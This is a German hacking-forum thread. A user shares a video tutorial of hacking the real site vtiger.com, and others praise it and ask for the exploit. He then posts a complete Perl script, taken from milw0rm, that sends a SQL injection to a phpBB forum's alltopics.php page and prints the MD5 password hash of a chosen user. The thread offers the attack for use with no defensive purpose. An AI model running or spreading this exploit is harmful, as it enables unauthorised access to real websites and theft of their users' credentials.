Gpm hackt vtiger.com

[gpm]

Hi,
Viel Spaß damit. Sehr oft besuchte und relativ sichere Seite.

Code:

http://rapidshare.com/files/52449894/Gpm.rar

Bei Fragen einfach pm!

[FoeR]

den exploit kannst du rein tun

[GODFATHER]

Also was mir gefallen hat ist das du alles schön langsam gemacht hast nicht wie ich immer mit Hektik ;>.

Leg noch den Sploit nach und wir haben noch ein schönes VideoTutorial was es vorher nicht gegeben hat in dieser Sektion.


nice job bro weiter so

[gpm]

Der Expl. ich glaube das der hier schon bekannt ist.

Code:

#!/usr/bin/perl 
#from http://www.milw0rm.com/exploits/2248 

use IO::Socket; 

print q{ 
=> Insert URL 
=> without ( http ) 
=> }; 
$server = <STDIN>; 
chop ($server); 
print q{ 
=> Insert directory 
=> es: /forum/ - /phpBB2/ 
=> }; 
$dir = <STDIN>; 
chop ($dir); 
print q{ 
=> User ID 
=> Number: 
=> }; 
$user = <STDIN>; 
chop ($user); 
if (!$ARGV[2]) { 
} 
$myuser = $ARGV[3]; 
$mypass = $ARGV[4]; 
$myid = $ARGV[5]; 
$server =~ s/(http:\/\/)//eg; 
$path = $dir; 
$path .= "alltopics.php?mode=&order=ASC&start=-1%20UNION%20SELECT%20user_password%20FROM%20phpbb_users%20where%20user_id=".$user ; 
print " 
=> Exploit in process...\r\n"; 
$socket = IO::Socket::INET->new( 
Proto => "tcp", 
PeerAddr => "$server", 
PeerPort => "80") || die "Exploit failed"; 
print "Exploit\r\n"; 
print "in process...\r\n"; 
print $socket "GET $path HTTP/1.1\r\n"; 
print $socket "Host: $server\r\n"; 
print $socket "Accept: */*\r\n"; 
print $socket "Connection: close\r\n\r\n"; 
print "Exploit finished!\r\n\r\n"; 
while ($answer = <$socket>) 
{ 
if ($answer =~/(\w{32})/) 
{ 
if ($1 ne 0) { 
print "MD5-Hash is: ".$1."\r\n"; 
} 
exit(); 
} 
}

[RaG3]

Nice Tut, aber ich wär auch dafür, dass mir jemand mal bitte ziegen möge wie man 67 Mb zu 0,9 MB gepackt bekommt o.O^^